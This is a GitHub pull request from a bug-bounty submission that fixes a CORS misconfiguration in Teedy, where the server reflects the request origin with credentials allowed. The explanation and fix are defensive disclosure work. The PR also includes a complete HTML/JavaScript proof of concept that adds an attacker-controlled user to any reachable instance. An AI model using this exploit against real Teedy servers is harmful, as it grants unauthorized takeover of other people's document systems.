Skip to content
This repository was archived by the owner on Dec 19, 2023. It is now read-only.

Fixing CORs Issue That Allows Unautharized Access To The Teedy Instance Via CSRF Adding User. #1

Open
DEMON1A wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Fixing CORs Issue That Allows Unautharized Access To The Teedy Instance Via CSRF Adding User. #1

DEMON1A wants to merge 1 commit into from

Conversation

@DEMON1A
Copy link

@DEMON1A DEMON1A commented Feb 13, 2021

📊 Metadata *

  • CORs Misconfig Chained With Improper CSRF Validation On Cookies Leads To Instance Takeover By Adding a User To The Instance With Attacker Controlled Credentials.

Bounty URL: https://www.huntr.dev/bounties/2-other-docs/

⚙️ Description *

  • This Issue Can Be Fixed With Multiple Fixes. But Before That I Would Like To Explain The Root Case, And Why This's Happening. docs-web is Using docs-web-commons For Multiple Things. Including The CORs Filter. In docs-web-common CORs Filter. You're Returning The Value Of The request.getHeader("origin") On The Access-Control-Allow-Origin Header. That Allows Any Site On The World To Send HTTP Requests To The Instance And Read The Response Since Access-Control-Allow-Credentials Is Set To true. Before Using The CORs Under /api/* You're Checking If The Application is On Development First. Okay, The Problem Is That Every Manual Builds Are Used With application.mode,dev. The Users Have To Change That From pom.xml But Nothing Is Pointed About It. The Cors Misconfig Can Lead To Sirius Issues. In This Case Attackers Are Able To Add Users Into The Instance With Their Own Credentials Then Login With It And Gain Access To The Teedy Instance. Even On Dev Mode. Developers Won't Need Such Thing. They Can Just Temp. Disable Chrome Protections. The Way You're Handling CORs Isn't Secure. See The Bounty URL. For The Hall Issue Description With a Proof Of Concept For The Instance Takeover.

💻 Technical Description *

  • The Fix I Added Was Changing response.addHeader('Access-Control-Allow-Credentials' , 'true') Into response.addHeader('Access-Control-Allow-Credentials' , 'false') On CORsfilter.java To Disable Sending Credentials With The XHR Requests.

  • You Can Apply Other Fixes Like. Adding an Array With Allowed Hosts. Then Check If origin Header Is One Of Them. If It's Then Reflect The Origin And Allow Credentials. If It's Not. Then Reflect The Origin Without Credentials Allowed. Tell Me If You Want Me To Apply This Fix. I Can Change The Files Before The PR Getting Accepted/Rejected.

🐛 Proof of Concept (PoC) *

  • Use This HTML Code With Replacing {HOST} With Your Own Teedy Instance Host. Then View On Browser > Click The Button. And Another User Will Be Added To Your Instance And You Will Be Able To Login With: tester:password123
<!DOCTYPE html>
<html>
<head>
    <title>Hello World</title>
</head>
<body>
    <div style="text-align: center;">
        <h1>Click The Button Below</h1>
        <input type="button" name="test" onclick="addUser();">
    </div>

    <script type="text/javascript">
        function addUser() {
            const http = new XMLHttpRequest();
            const url = "http://{HOST}:8080/docs-web/api/user?email=hacker@gmail.com&password=password123&passwordconfirm=password123&storage_quota=100000000&username=tester";

            http.withCredentials = true;
            http.open('PUT' , url);
            http.setRequestHeader('Content-Type' , 'application/x-www-form-urlencoded;charset=utf-8')
            http.send();

            http.onreadystatechange = (e) => {
                alert('Exploited!');
            }
        }
    </script>
</body>
</html>

🔥 Proof of Fix (PoF) *

  • Here's a Screen Shot For The Edit I Made On My Instance Code. Now It's Working With Disallowed Credentials.

Docs-Proof-Of-Fix

👍 User Acceptance Testing (UAT)

  • as I Said Before. Tested On My Instance.

🔗 Relates to...

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Feb 13, 2021
Added fix submission to FixSubmissionCount for 418sec/docs#1
de704c5
@huntr-helper
Copy link

huntr-helper commented Feb 13, 2021

👋 Hello, @jendib - @DEMON1A has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@jendib & @DEMON1A - thank you for your efforts in securing the world’s open source code! 🎉

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@DEMON1A @huntr-helper